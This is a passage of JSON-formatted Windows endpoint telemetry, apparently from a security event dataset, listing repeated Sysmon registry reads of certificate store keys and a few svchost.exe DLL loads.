"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "miutils.dll", - "image_path": "C:\\Windows\\System32\\miutils.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879800000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WsmSvc.dll", - "image_path": "C:\\Windows\\System32\\WsmSvc.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - 